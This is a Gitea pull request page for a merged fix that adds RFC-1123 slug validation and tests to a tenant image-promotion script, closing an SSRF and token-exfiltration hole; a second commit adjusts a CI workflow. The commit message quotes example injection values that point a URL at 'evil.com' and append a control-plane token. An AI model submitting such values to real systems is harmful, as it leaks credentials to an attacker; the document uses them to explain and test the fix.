molecule-ai/molecule-core
41
0
Fork 2
Code Issues 43 Pull Requests -2 Actions 643 Packages Projects Releases Wiki Activity

fix(scripts): add slug validation to prevent SSRF + token exfiltration (OFFSEC-006) #933

Merged
devops-engineer merged 2 commits from fix/offsec-006-slug-injection into staging 2026-05-14 03:00:44 +00:00
Conversation 23 Commits 2 Files Changed 3 +143 -1

2 Commits

Author SHA1 Message Date
Molecule AI Core-BE
3a43036950 fix(ci): use GITHUB_EVENT_BEFORE in handlers-pg-integ detect-changes
Some checks failed
Block internal-flavored paths / Block forbidden paths (pull_request) Successful in 8s
Details
Lint curl status-code capture / Scan workflows for curl status-capture pollution (pull_request) Successful in 15s
Details
CI / Detect changes (pull_request) Successful in 26s
Details
Handlers Postgres Integration / detect-changes (pull_request) Successful in 29s
Details
E2E API Smoke Test / detect-changes (pull_request) Successful in 31s
Details
Secret scan / Scan diff for credential-shaped strings (pull_request) Successful in 18s
Details
Runtime PR-Built Compatibility / detect-changes (pull_request) Successful in 35s
Details
qa-review / approved (pull_request) Successful in 21s
Details
security-review / approved (pull_request) Successful in 20s
Details
sop-checklist-gate / gate (pull_request) Successful in 11s
Details
gate-check-v3 / gate-check (pull_request) Successful in 12s
Details
sop-tier-check / tier-check (pull_request) Successful in 9s
Details
CI / Platform (Go) (pull_request) Successful in 6s
Details
lint-required-no-paths / lint-required-no-paths (pull_request) Successful in 1m21s
Details
CI / Canvas (Next.js) (pull_request) Successful in 8s
Details
CI / Python Lint & Test (pull_request) Successful in 7s
Details
E2E API Smoke Test / E2E API Smoke Test (pull_request) Successful in 7s
Details
Runtime PR-Built Compatibility / PR-built wheel + import smoke (pull_request) Successful in 5s
Details
lint-continue-on-error-tracking / lint-continue-on-error-tracking (pull_request) Failing after 1m34s
Details
CI / Shellcheck (E2E scripts) (pull_request) Successful in 18s
Details
Lint workflow YAML (Gitea-1.22.6-hostile shapes) / Lint workflow YAML for Gitea-1.22.6-hostile shapes (pull_request) Successful in 1m40s
Details
Lint pre-flip continue-on-error / Verify continue-on-error flips have run-log proof (pull_request) Successful in 1m51s
Details
Ops Scripts Tests / Ops scripts (unittest) (pull_request) Successful in 1m33s
Details
lint-required-context-exists-in-bp / lint-required-context-exists-in-bp (pull_request) Successful in 2m5s
Details
Handlers Postgres Integration / Handlers Postgres Integration (pull_request) Failing after 1m21s
Details
CI / Canvas Deploy Reminder (pull_request) Has been skipped
Details
CI / all-required (pull_request) Successful in 2s
Details
sop-checklist / na-declarations (pull_request) awaiting /sop-n/a declaration for: qa-review, security-review
Details
sop-checklist / all-items-acked (pull_request) [info tier:low] acked: 5/7 — missing: root-cause, no-backwards-compat — body-unfilled: comprehensive-testing, local-postgres-e2e, staging-sm
Details
audit-force-merge / audit (pull_request) Successful in 13s
Details 
The Gitea Actions `github.event.before` template expression evaluates to
empty string in shell scripts (Gitea Actions does not expand these objects
to JSON strings). Use the shell environment variable `GITHUB_EVENT_BEFORE`
instead, which Gitea Actions correctly populates for push events.

Same fix as #919 applied to handlers-postgres-integration.yml.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
 2026-05-14 02:49:38 +00:00
Molecule AI Core-BE
47aa82f0f2 fix(scripts): add slug validation to prevent SSRF + token exfiltration (OFFSEC-006)
Some checks failed
Block internal-flavored paths / Block forbidden paths (pull_request) Successful in 26s
Details
CI / Detect changes (pull_request) Successful in 50s
Details
E2E API Smoke Test / detect-changes (pull_request) Successful in 41s
Details
Secret scan / Scan diff for credential-shaped strings (pull_request) Successful in 18s
Details
Handlers Postgres Integration / detect-changes (pull_request) Successful in 50s
Details
qa-review / approved (pull_request) Successful in 20s
Details
Runtime PR-Built Compatibility / detect-changes (pull_request) Successful in 43s
Details
gate-check-v3 / gate-check (pull_request) Successful in 28s
Details
security-review / approved (pull_request) Successful in 19s
Details
sop-checklist-gate / gate (pull_request) Successful in 18s
Details
sop-tier-check / tier-check (pull_request) Successful in 18s
Details
CI / Platform (Go) (pull_request) Successful in 9s
Details
CI / Canvas (Next.js) (pull_request) Successful in 10s
Details
E2E API Smoke Test / E2E API Smoke Test (pull_request) Successful in 21s
Details
CI / Python Lint & Test (pull_request) Successful in 17s
Details
lint-required-no-paths / lint-required-no-paths (pull_request) Successful in 1m32s
Details
CI / Shellcheck (E2E scripts) (pull_request) Successful in 23s
Details
CI / Canvas Deploy Reminder (pull_request) Has been skipped
Details
Handlers Postgres Integration / Handlers Postgres Integration (pull_request) Successful in 5s
Details
Runtime PR-Built Compatibility / PR-built wheel + import smoke (pull_request) Successful in 7s
Details
CI / all-required (pull_request) Successful in 5s
Details
sop-checklist / na-declarations (pull_request) awaiting /sop-n/a declaration for: qa-review, security-review
Details
sop-checklist / all-items-acked (pull_request) acked: 0/7 — missing: comprehensive-testing, local-postgres-e2e, staging-smoke, +4 — body-unfilled: comprehensive-testing, local-postgres-e2
Details
Ops Scripts Tests / Ops scripts (unittest) (pull_request) Successful in 1m24s
Details 
OFFSEC-006: tenant slug interpolated into URLs (cp_redeploy_tenant,
tenant_buildinfo, tenant_health, resolve_tenant_instance_id) without
validation, enabling SSRF via slug=?url=https://evil.com and token
exfiltration via slug=?url=https://evil.com&token=$CP_TOKEN.

Changes:
- scripts/promote-tenant-image.sh:
  - Added `set -f` (noglob) at top to prevent glob metacharacter expansion
    in slug strings before any network call.
  - Added validate_slug() with RFC-1123 regex ^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$
    to reject malformed slugs before any URL interpolation.
  - Added validate_tenants() called after argument parsing (exit 64).
  - Placed early err() stub before validate_slug to avoid forward-reference.
- scripts/test-promote-tenant-image.sh: Added 3 new test groups (13–15):
  - Test 13: valid slugs (single-char, hyphenated, alphanum) pass.
  - Test 14: 10 malformed slug patterns rejected before any network call.
  - Test 15: 6 SSRF + token-exfiltration injection patterns rejected.
  All 43 tests pass.

Closes: molecule-ai/molecule-core#929

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
 2026-05-14 02:46:11 +00:00